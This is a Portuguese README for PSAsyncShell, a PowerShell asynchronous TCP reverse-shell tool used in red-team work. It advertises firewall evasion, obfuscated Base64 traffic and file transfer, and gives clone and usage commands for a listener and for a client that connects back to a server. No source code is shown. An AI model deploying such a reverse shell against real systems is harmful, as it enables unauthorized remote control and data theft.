
Shell reverso TCP assíncrono em PowerShell puro que ignora firewalls via I/O não bloqueante, com histórico de comandos, upload/download de arquivos e tráfego Base64 ofuscado.

PSAsyncShell é um Shell Reverso TCP Assíncrono escrito em PowerShell puro.
Ao contrário de outros shells reversos, todo o fluxo de comunicação e execução é feito de forma assíncrona, permitindo contornar alguns firewalls e algumas contramedidas contra este tipo de conexões remotas.
Além disso, esta ferramenta possui histórico de comandos, limpeza de tela, upload e download de arquivos, divisão de informações em chunks e tráfego reverso codificado em Base64 URL e ofuscado.
É recomendado clonar o repositório completo ou baixar o arquivo zip. Você pode fazer isso executando o seguinte comando:
git clone https://github.com/JoelGMSec/PSAsyncShell
.\PSAsyncShell.ps1 -h
____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/
---------------------- by @JoelGMSec -----------------------
Info: Esta ferramenta ajuda a obter um shell remoto
sobre TCP assíncrono para contornar firewalls
Uso: .\PSAsyncShell.ps1 -s -p porta_escuta
Escuta por uma nova conexão do cliente
.\PSAsyncShell.ps1 -c ip_servidor porta_servidor
Conecta o cliente a um servidor PSAsyncShell
Aviso: Todos os dados serão enviados sem criptografia
A função de upload não usa MultiPart
https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona
Este projeto está licenciado sob a licença GNU 3.0 - veja o arquivo LICENSE para mais detalhes.
Esta ferramenta foi criada e desenhada do zero por Joel Gámez Molina // @JoelGMSec
Este software não oferece qualquer tipo de garantia. Seu uso é exclusivo para ambientes educacionais e/ou auditorias de segurança com o consentimento correspondente do cliente. Não sou responsável pelo seu uso indevido ou por qualquer dano possível causado por ele.
Para mais informações, você pode me encontrar no Twitter como @JoelGMSec e no meu blog darkbyte.net.
Você pode apoiar meu trabalho comprando um café para mim: